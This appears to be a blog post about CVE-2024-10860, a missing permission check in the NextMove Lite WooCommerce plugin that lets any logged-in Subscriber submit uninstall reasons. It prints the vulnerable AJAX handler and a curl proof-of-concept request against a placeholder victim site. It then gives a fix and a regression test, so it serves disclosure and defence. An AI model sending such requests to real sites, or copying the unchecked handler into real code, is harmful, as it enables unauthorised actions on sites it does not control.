CVE-2024-10860 - How NextMove Lite’s Missing Check Lets Subscribers Submit Uninstall Reasons on WooCommerce Sites
CVE-2024-10860 sheds light on a common but risky oversight in WordPress plugin development: missing access control on important actions. This time, the plugin in the spotlight is "NextMove Lite – Thank You Page for WooCommerce." Widely used to enhance customer experience after checkout, it quietly harbored a vulnerability that let even the lowest-level logged-in users perform actions they shouldn’t be able to do.
Let’s walk through what was wrong, how it could be exploited, and what you should do about it.
What’s the Vulnerability?
In all versions of NextMove Lite up to and including 2.19., the _submit_uninstall_reason_action() function allows any authenticated user—even a simple Subscriber—to send a deactivation reason for the plugin. Normally, only admins should be able to do this. But the function forgot a capability check.
In other words:
If you’re logged in as any user (not even an admin!), you can submit a plugin uninstall reason. Not a critical, site-destroying bug, but a definite violation of permissions.
Here’s a simplified look at the relevant code in the vulnerable plugin:

add_action('wp_ajax_submit_uninstall_reason', '_submit_uninstall_reason_action');

function _submit_uninstall_reason_action() {
    // No capability check: any logged-in user reaches this point.
    $reason = isset($_POST['reason']) ? sanitize_text_field($_POST['reason']) : '';
    // ...some code to save or process the reason...
    wp_send_json_success(['message' => 'Reason submitted successfully!']);
}
There is no permission check such as:

if ( ! current_user_can( 'manage_options' ) ) {
    wp_send_json_error(['message' => 'Permission denied!']);
    exit;
}
Proof of Concept Exploit
Imagine you run a store where hundreds of people have customer accounts (usually just "Subscribers" in WordPress). A malicious person could run the following AJAX request as a logged-in user—no admin rights needed:
curl -X POST 'https://victimsite.com/wp-admin/admin-ajax.php?action=submit_uninstall_reason' \
    -d 'reason=Just+for+fun' \
    -b 'wordpress_logged_in_...'
What happens?
The server replies:
{ "success": true, "data": { "message": "Reason submitted successfully!" } }
The attacker just submitted an uninstall reason as if they were the site owner.
- Annoying: Attackers could spam fake uninstall reasons or confuse audit trails.
- Foot in the Door: Bugs like this are often suggestive of overall weak access handling. If one AJAX action is insecure, there might be others with more serious impact.
Remediation
Update now!
The plugin authors have fixed this bug in version 2.19.1 and above. The safest move is to update your plugin from WordPress.org.
If for some reason you must patch an older version yourself, add an early capability check in the function:
function _submit_uninstall_reason_action() {
    // Reject anyone who cannot manage the site before touching the request.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error(['message' => 'Permission denied!']);
        exit;
    }
    // ...rest of the code...
}
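As an added example (not the plugin's own code), here is a hardened handler together with a WordPress PHPUnit regression test that proves a Subscriber is refused while an Administrator succeeds. Beyond the capability check the post describes, it also verifies a nonce; the function name, option name and the nonce action 'nextmove_uninstall_nonce' are assumptions made for this example.

```php
<?php
// Added example: hardened handler plus a WP_Ajax_UnitTestCase regression test.
// Names below are hypothetical; 'nextmove_uninstall_nonce' is an assumed nonce action.

add_action( 'wp_ajax_submit_uninstall_reason', 'example_submit_uninstall_reason_action' );

function example_submit_uninstall_reason_action() {
    // Authorization: only users who can manage the site may send a deactivation reason.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Permission denied!' ), 403 );
    }
    // Request integrity (addition beyond the page's fix): reject requests without a valid nonce.
    check_ajax_referer( 'nextmove_uninstall_nonce', 'security' );

    $reason = isset( $_POST['reason'] ) ? sanitize_text_field( wp_unslash( $_POST['reason'] ) ) : '';
    update_option( 'example_uninstall_reason', $reason );
    wp_send_json_success( array( 'message' => 'Reason submitted successfully!' ) );
}

// Regression test: a Subscriber must be denied, an Administrator must succeed.
class Test_Uninstall_Reason_Capability extends WP_Ajax_UnitTestCase {
    private function submit( $role ) {
        $this->_setRole( $role );                        // creates and logs in a user with that role
        $_POST['reason']   = 'constructed test reason';  // constructed input
        $_POST['security'] = wp_create_nonce( 'nextmove_uninstall_nonce' );
        try {
            $this->_handleAjax( 'submit_uninstall_reason' );
        } catch ( WPAjaxDieContinueException $e ) {
            // wp_send_json_* ends the request with wp_die(); the harness turns that into this exception.
        }
        return json_decode( $this->_last_response, true );
    }

    public function test_subscriber_is_denied() {
        $response = $this->submit( 'subscriber' );
        $this->assertFalse( $response['success'] );
        $this->assertSame( 'Permission denied!', $response['data']['message'] );
        $this->assertFalse( get_option( 'example_uninstall_reason' ) );  // nothing was stored
    }

    public function test_administrator_is_allowed() {
        $response = $this->submit( 'administrator' );
        $this->assertTrue( $response['success'] );
        $this->assertSame( 'constructed test reason', get_option( 'example_uninstall_reason' ) );
    }
}
```

Run it with the WordPress PHPUnit test suite (WP_Ajax_UnitTestCase is part of the core test framework); a handler that drops the capability check will fail the first test immediately.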
References
- Original Vulnerability Report (Wordfence Threat Intelligence)
- Plugin Page
- CVE Record
Takeaway
CVE-2024-10860 is a textbook lesson in why all privileged plugin actions—especially those available over AJAX—*must* include user capability checks. While this one is minor in impact, it easily could have been worse. Don’t wait; update your plugins regularly and review your own code for permission checks!
Have thoughts or questions? Drop them below, and keep your sites secure! 🚀
Timeline
Published on: 02/28/2025 10:15:09 UTC